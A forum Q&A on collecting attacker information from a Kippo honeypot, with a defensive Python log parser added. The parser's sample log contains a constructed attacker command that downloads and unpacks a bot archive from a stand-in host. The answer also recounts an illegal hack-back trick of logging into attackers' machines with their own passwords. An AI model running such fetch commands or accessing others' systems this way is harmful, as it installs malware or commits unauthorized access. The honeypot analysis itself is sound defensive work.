1

I've installed a Kippo honeypot on my server and I wanted to know if there are some tools I can launch to collect more information about the cracker.

I want more information to be able to start some forensics stuff.

schroeder
dh4rm4

1 Answer

1

There is nothing you can "install" to deanonymize an attacker. Once you get the data from Kippo about the IP and connection type, you have as much as you can get unless the attacker reveals more about themselves from their actions. There are tools that you can use to enhance the data a little, but that does not break anonymity.

Most of the investigations that uncover the cracker's identity that I have successfully performed have been the result of the files they try to install or the download locations they use or the passwords they try to use. So, it's all down to a manual investigation. It's not the data that Kippo captures that does it, it's the data that the Kippo data points to that does it. And it's difficult to predict what that might end up being.

... Unless you break the law and hack the hacker back. I know one person who ran a Kippo honeypot and configured a script to use the same password the attacker set for a new account to try to log in to the attacker's machine. He had a 10% success rate (attackers re-using passwords). But, this is illegal in most jurisdictions (unauthorised access).

schroeder
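
The answer above names attempted passwords, downloaded files and download locations as the starting points for a manual investigation. As an added example (not part of the original answer, and not Kippo's own code), this Python script pulls those items out of log lines and groups them by source IP. The sample lines are constructed, the line layout is an assumption modelled on Kippo's text log, and `extract_pivots` is a hypothetical name.

```python
import re
from collections import defaultdict

# Constructed sample lines; the layout is an assumption modelled on Kippo's text log.
SAMPLE_LOG = """\
2014-03-02 10:15:01+0000 [SSHService ssh-userauth on HoneyPotTransport,7,203.0.113.5] login attempt [root/123456] failed
2014-03-02 10:15:03+0000 [SSHService ssh-userauth on HoneyPotTransport,7,203.0.113.5] login attempt [root/toor] succeeded
2014-03-02 10:15:20+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,7,203.0.113.5] CMD: wget http://files.example.net/a/bot.tgz; tar xzf bot.tgz
2014-03-02 11:02:44+0000 [SSHService ssh-userauth on HoneyPotTransport,9,198.51.100.23] login attempt [admin/admin] failed
"""

# Prefix "[... HoneyPotTransport,<session>,<ip>]" followed by the log message.
LINE = re.compile(r"\[[^\]]*HoneyPotTransport,(?P<sid>\d+),(?P<ip>[0-9a-fA-F.:]+)\]\s+(?P<msg>.*)$")
# Greedy password group so a ']' inside the password does not cut it short.
LOGIN = re.compile(r"login attempt \[(?P<user>[^/\]]*)/(?P<pw>.*)\] (?P<result>succeeded|failed)$")
# Stop at shell separators and quotes so "url; next-command" yields only the URL.
URL = re.compile(r"(?:https?|ftp)://[^\s;|&'\"]+")


def extract_pivots(log_text):
    """Group attempted credentials, typed commands and download URLs by source IP."""
    pivots = defaultdict(lambda: {"credentials": [], "commands": [], "urls": []})
    for line in log_text.splitlines():
        m = LINE.search(line)
        if not m:
            continue  # not a per-session line, nothing to attribute
        entry, msg = pivots[m.group("ip")], m.group("msg")
        login = LOGIN.match(msg)
        if login:
            entry["credentials"].append((login["user"], login["pw"], login["result"]))
        elif msg.startswith("CMD: "):
            cmd = msg[len("CMD: "):]
            entry["commands"].append(cmd)
            for url in URL.findall(cmd):
                if url not in entry["urls"]:  # keep each download location once
                    entry["urls"].append(url)
    return dict(pivots)


if __name__ == "__main__":
    for ip, data in extract_pivots(SAMPLE_LOG).items():
        print(ip)
        for user, pw, result in data["credentials"]:
            print(f"  tried {user!r} / {pw!r} ({result})")
        for url in data["urls"]:
            print(f"  download location: {url}")
```

The output is only a worklist: each password and download location still has to be followed up by hand, as the answer describes.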